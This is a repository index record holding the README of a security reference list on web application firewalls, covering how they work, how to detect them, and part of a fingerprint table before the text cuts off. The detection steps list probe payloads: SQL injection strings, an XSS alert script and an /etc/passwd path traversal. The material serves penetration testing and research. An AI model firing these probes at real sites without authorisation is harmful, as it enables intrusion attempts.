{"id":13469273,"url":"https://github.com/0xInfection/Awesome-WAF","last_synced_at":"2025-03-26T06:32:07.602Z","repository":{"id":37318608,"uuid":"164564630","full_name":"0xInfection/Awesome-WAF","owner":"0xInfection","description":"🔥 Web-application firewalls (WAFs) from security standpoint.","archived":false,"fork":false,"pushed_at":"2024-10-28T06:44:26.000Z","size":30536,"stargazers_count":6551,"open_issues_count":2,"forks_count":1083,"subscribers_count":254,"default_branch":"master","last_synced_at":"2025-03-18T00:08:20.538Z","etag":null,"topics":["awesome","awesome-list","bypass-waf","firewall","infosec","security","waf","waf-bypass","waf-detection","waf-fingerprints","waf-test","waf-testing","web-application-firewall"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/0xInfection.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-01-08T04:57:06.000Z","updated_at":"2025-03-17T08:07:58.000Z","dependencies_parsed_at":"2024-01-12T09:45:41.371Z","dependency_job_id":null,"html_url":"https://github.com/0xInfection/Awesome-WAF","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xInfection%2FAwesome-WAF","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xInfection%2FAwesome-WAF/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xInfection%2FAwesome-WAF/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/0xInfection%2FAwesome-WAF/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/0xInfection","download_url":"https://codeload.github.com/0xInfection/Awesome-WAF/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245315291,"owners_count":20595217,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["awesome","awesome-list","bypass-waf","firewall","infosec","security","waf","waf-bypass","waf-detection","waf-fingerprints","waf-test","waf-testing","web-application-firewall"],"created_at":"2024-07-31T15:01:31.462Z","updated_at":"2025-03-26T06:32:02.587Z","avatar_url":"https://github.com/0xInfection.png","language":"Python","funding_links":[],"categories":["Python","Github resources","web shell、shellcode","Python (1887)","Other Lists","awesome-list","Security \u0026 Hacking"],"sub_categories":["Posts from Hacker101 members on how to get started hacking","网络服务_其他","TeX Lists"],"readme":"# Awesome WAF [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg \"Awesome\")](https://github.com/0xinfection/awesome-waf)\nEverything about web application firewalls (WAFs) from a security perspective. 🔥\n\u003e\n\u003e __Foreword:__ This was originally my own collection on WAFs. I am open-sourcing it in the hope that it will be useful for pentesters and researchers out there.As the saying goes, \"the community just learns from each other.\"\n\n![Main Logo](images/how-wafs-work.png 'How wafs work')\n\n__A Concise Definition:__ A firewall is a security policy enforcement point positioned between a web application and the client endpoint. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components. *(Source: [PCI DSS IS 6.6](https://www.pcisecuritystandards.org/documents/information_supplement_6.6.pdf))*\n\nA web-application firewall sits between a user and a webapp and is tasked to prevent any malicious activity from reaching the webapp. A WAF either filters out the malicious part of the request or just simply blocks it.\n\nFeel free to [contribute](CONTRIBUTING.md).\n\n### Contents:\n- [Introduction](#introduction)\n - [How WAFs Work](#how-wafs-work)\n - [Operation Modes](#operation-modes)\n- [Testing Methodology](#testing-methodology)\n - [Where To Look](#where-to-look)\n - [Detection Techniques](#detection-techniques)\n- [WAF Fingerprints](#waf-fingerprints)\n- [Evasion Techniques](#evasion-techniques)\n - [Fuzzing/Bruteforcing](#fuzzingbruteforcing)\n - [Regex Reversing](#regex-reversing)\n - [Obfuscation/Encoding](#obfuscation)\n - [Browser Bugs](#browser-bugs)\n - [HTTP Header Spoofing](#request-header-spoofing)\n - [Google Dorks Approach](#google-dorks-approach)\n- [Known Bypasses](#known-bypasses)\n- [Awesome Tooling](#awesome-tools)\n - [Fingerprinting](#fingerprinting)\n - [Testing](#testing)\n - [Evasion](#evasion)\n- [Blogs \u0026 Writeups](#blogs-and-writeups)\n- [Video Presentations](#video-presentations)\n- [Research Presentations \u0026 Papers](#presentations--research-papers)\n - [Research Papers](#research-papers)\n - [Presentation Slides](#presentations)\n- [Licensing \u0026 Credits](#credits--license)\n\n## Introduction:\n### How WAFs Work:\n- Using a set of rules to distinguish between normal requests and malicious requests.\n- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.\n\n### Operation Modes:\n- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block requests that are clearly malicious. The signatures of WAFs operating in a negative model are specifically crafted to prevent attacks which exploit certain web application vulnerabilities. Blacklisting model web application firewalls are a great choice for web applications exposed to the public internet and are highly effective against major vulnerabilities. Eg. Rule for blocking all `\u003cscript\u003e*\u003c/script\u003e` inputs prevent basic cross-site scripting attacks.\n- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking potential large scale attacks, but will also block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.\n- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet. A good scenario can be when web-application is facing the public internet (use blacklists) while the admin panel needs to be exposed to only a subset of users (use whitelists).\n\n## Testing Methodology:\n### Where To Look:\n- Always look out for common ports that expose that a WAF, namely `80`, `443`, `8000`, `8080` and `8888` ports. However, its important to note that a WAF can be easily deployed on any port running a HTTP service. It is good to enumerate HTTP service ports first hand and then look for WAFs.\n- Some WAFs set their own cookies in requests (e.g. Citrix Netscaler, Yunsuo WAF).\n- Some associate themselves with separate headers (e.g. Anquanbao WAF, Amazon AWS WAF). \n- Some often alter headers and jumble characters to confuse attacker (e.g. Netscaler, Big-IP).\n- Some expose themselves in the `Server` header (e.g. Approach, WTS WAF).\n- Some WAFs expose themselves in the response content (e.g. DotDefender, Armor, Sitelock).\n- Other WAFs reply with unusual response codes upon malicious requests (e.g. WebKnight, 360 WAF).\n\n### Detection Techniques:\nTo identify WAFs, we need to (dummy) provoke it.\n1. Make a normal GET request from a browser, intercept and record response headers (specifically cookies).\n2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).\n3. Make GET requests to random open ports and grab banners which might expose the WAFs identity.\n4. On login pages, inject common (easily detectable) payloads like `\" or 1 = 1 --`.\n5. Inject noisy payloads like `\u003cscript\u003ealert()\u003c/script\u003e` into search bars, contact forms and other input fields.\n6. Attach a dummy `../../../etc/passwd` to a random parameter at end of URL.\n7. Append some catchy keywords like `' OR SLEEP(5) OR '` at end of URLs to any random parameter.\n8. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).\n9. Many a times, the WAF varies the `Server` header upon different types of interactions.\n10. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.\n \u003e __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).\n11. Side Channel Attacks - Examine the timing behaviour of the request and response content.\n \u003e __Tip:__ More details can be found in a [blogpost here](https://0xinfection.github.io/posts/fingerprinting-wafs-side-channel/).\n\n## WAF Fingerprints\nWanna fingerprint WAFs? Lets see how.\n\u003e __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#evasion-techniques). \n\n\u003ctable\u003e\n \u003ctr\u003e\n \u003ctd align=\"center\"\u003e\u003cb\u003eWAF\u003c/b\u003e\u003c/td\u003e\n \u003ctd align=\"center\"\u003e\u003cb\u003eFingerprints\u003c/b\u003e\u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n 360\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability:\u003c/b\u003e Easy \u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eReturns status code \u003ccode\u003e493\u003c/code\u003e upon unusual requests.\u003c/li\u003e\n \u003cli\u003eBlockpage may contain reference to \u003ccode\u003ewzws-waf-cgi/\u003c/code\u003e directory.\u003c/li\u003e\n \u003cli\u003eBlocked response page source may contain:\n \u003cul\u003e\n \u003cli\u003eReference to \u003ccode\u003ewangshan.360.cn\u003c/code\u003e URL.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSorry! Your access has been intercepted because your links may threaten website security.\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eResponse headers may contain \u003ccode\u003eX-Powered-By-360WZB\u003c/code\u003e header.\u003c/li\u003e\n \u003cli\u003eBlocked response headers contain unique header \u003ccode\u003eWZWS-Ray\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header may contain value \u003ccode\u003eqianxin-waf\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n aeSecure\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response content contains \u003ccode\u003eaesecure_denied.png\u003c/code\u003e image (view source to see).\u003c/li\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eaeSecure-code\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Airlock\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate/Difficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSet-Cookie\u003c/code\u003e headers may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eAL-SESS\u003c/code\u003e cookie field name (case insensitive).\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eAL-LB\u003c/code\u003e value (case insensitive).\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer detected a syntax error in your request\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eCheck your request and all parameters\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n AlertLogic\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability:\u003c/b\u003e Difficult\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eWe are sorry, but the page you are looking for cannot be found\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eThe page has either been removed, renamed or temporarily unavailable\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003e404 Not Found\u003c/code\u003e in red letters.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Aliyundun\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability:\u003c/b\u003e Easy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSorry, your request has been blocked as it may cause potential threats to the server's security\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003eerrors.aliyun.com\u003c/code\u003e site URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eBlocked response code returned is \u003ccode\u003e405\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Anquanbao\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eReturns blocked HTTP response code \u003ccode\u003e405\u003c/code\u003e upon malicious requests.\u003c/li\u003e\n \u003cli\u003eBlocked response content may contain \u003ccode\u003e/aqb_cc/error/\u003c/code\u003e or \u003ccode\u003ehidden_intercept_time\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eResponse headers contain \u003ccode\u003eX-Powered-by-Anquanbao\u003c/code\u003e header field.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Anyu\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response content contains \u003ccode\u003eSorry! your access has been intercepted by AnYu\u003c/code\u003e\u003c/li\u003e\n \u003cli\u003eBlocked response page contains \u003ccode\u003eAnYu- the green channel\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003eResponse headers may contain unusual header \u003ccode\u003eWZWS-RAY\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Approach\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page content may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eApproach Web Application Firewall Framework\u003c/code\u003e heading.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYour IP address has been logged and this information could be used by authorities to track you.\u003c/code\u003e warning.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eSorry for the inconvenience!\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eApproach infrastructure team\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header has field value set to \u003ccode\u003eApproach\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Armor Defense\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response content contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eThis request has been blocked by website protection from Armor\u003c/code\u003e text.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eIf you manage this domain please create an Armor support ticket\u003c/code\u003e snippet.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ArvanCloud\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eArvanCloud\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ASPA\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eASPA-WAF\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003eResponse contain unique header \u003ccode\u003eASPA-Cache-Status\u003c/code\u003e with content \u003ccode\u003eHIT\u003c/code\u003e or \u003ccode\u003eMISS\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n ASP.NET Generic\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers may contain \u003ccode\u003eX-ASPNET-Version\u003c/code\u003e header value.\u003c/li\u003e\n \u003cli\u003eBlocked response page content may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eThis generic 403 error means that the authenticated user is not authorized to use the requested resource\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eError Code 0x00000000\u003c\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003e\u003ccode\u003eX-Powered-By\u003c/code\u003e header has field value set to \u003ccode\u003eASP.NET\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Astra\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page content may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSorry, this is not allowed.\u003c/code\u003e in \u003ccode\u003eh1\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eour website protection system has detected an issue with your IP address and wont let you proceed any further\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003eReference to \u003ccode\u003ewww.getastra.com/assets/images/\u003c/code\u003e URL.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eResponse cookies has field value \u003ccode\u003ecz_astra_csrf_cookie\u003c/code\u003e in response headers.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n AWS ELB\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers might contain:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eAWSALB\u003c/code\u003e cookie field value.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eX-AMZ-ID\u003c/code\u003e header.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eX-AMZ-REQUEST-ID\u003c/code\u003e header.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003cli\u003eResponse page may contain:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eAccess Denied\u003c/code\u003e in their keyword.\u003c/li\u003e\n \u003cli\u003eRequest token ID with length from 20 to 25 between \u003ccode\u003eRequestId\u003c/code\u003e tag.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header field contains \u003ccode\u003eawselb/2.0\u003c/code\u003e value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Baidu Yunjiasu\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header may contain \u003ccode\u003eYunjiasu-nginx\u003c/code\u003e value.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header may contain \u003ccode\u003eYunjiasu\u003c/code\u003e value.\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Barikode\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page content contains:\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eBARIKODE\u003c/code\u003e keyword.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eForbidden Access\u003c/code\u003e text snippet in \u003ccode\u003eh1\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Barracuda\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse cookies may contain \u003ccode\u003ebarra_counter_session\u003c/code\u003e value.\u003c/li\u003e\n \u003cli\u003eResponse headers may contain \u003ccode\u003ebarracuda_\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003cli\u003eResponse page contains:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eYou have been blocked\u003c/code\u003e heading.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eYou are unable to access this website\u003c/code\u003e text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Bekchy\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response headers contains \u003ccode\u003eBekchy - Access Denied\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains reference to \u003ccode\u003ehttps://bekchy.com/report\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n BinarySec\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eX-BinarySec-Via\u003c/code\u003e field.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eX-BinarySec-NoCache\u003c/code\u003e field.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eBinarySec\u003c/code\u003e keyword.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n BitNinja\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eBlocked response page may contain:\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eSecurity check by BitNinja\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eyour IP will be removed from BitNinja\u003c/code\u003e.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003eVisitor anti-robot validation\u003c/code\u003e text snippet.\u003c/li\u003e\n \u003cli\u003e\u003ccode\u003e(You will be challenged by a reCAPTCHA page)\u003c/code\u003e text.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n BIG-IP ASM\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003eResponse headers may contain \u003ccode\u003eBigIP\u003c/code\u003e or \u003ccode\u003eF5\u003c/code\u003e keyword value.\u003c/li\u003e\n \u003cli\u003eResponse header fields may contain \u003ccode\u003eX-WA-Info\u003c/code\u003e header.\u003c/li\u003e\n \u003cli\u003eResponse headers might have jumbled \u003ccode\u003eX-Cnection\u003c/code\u003e field value.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n BlockDos\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eModerate\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains value \u003ccode\u003eBlockDos.net\u003c/code\u003e.\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n \u003ctd\u003e\n Bluedon IST\n \u003c/td\u003e\n \u003ctd\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003eDetectability: \u003c/b\u003eEasy\u003c/li\u003e\n \u003cli\u003e\u003cb\u003eDetection Methodology:\u003c/b\u003e\u003c/li\u003e\n \u003cul\u003e\n \u003cli\u003e\u003ccode\u003eServer\u003c/code\u003e header contains \u003ccode\u003eBDWAF\u003c/code\u003e field value.\u003c/li\u003e\n \u003cli\u003eBlocked response page contains to \u003ccode\u003eBluedon Web Application Firewall\u003c/code\u003e text snippet..\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n \u003c/td\u003e\n \u003c/tr\u003e\n \u003ctr\u003e\n 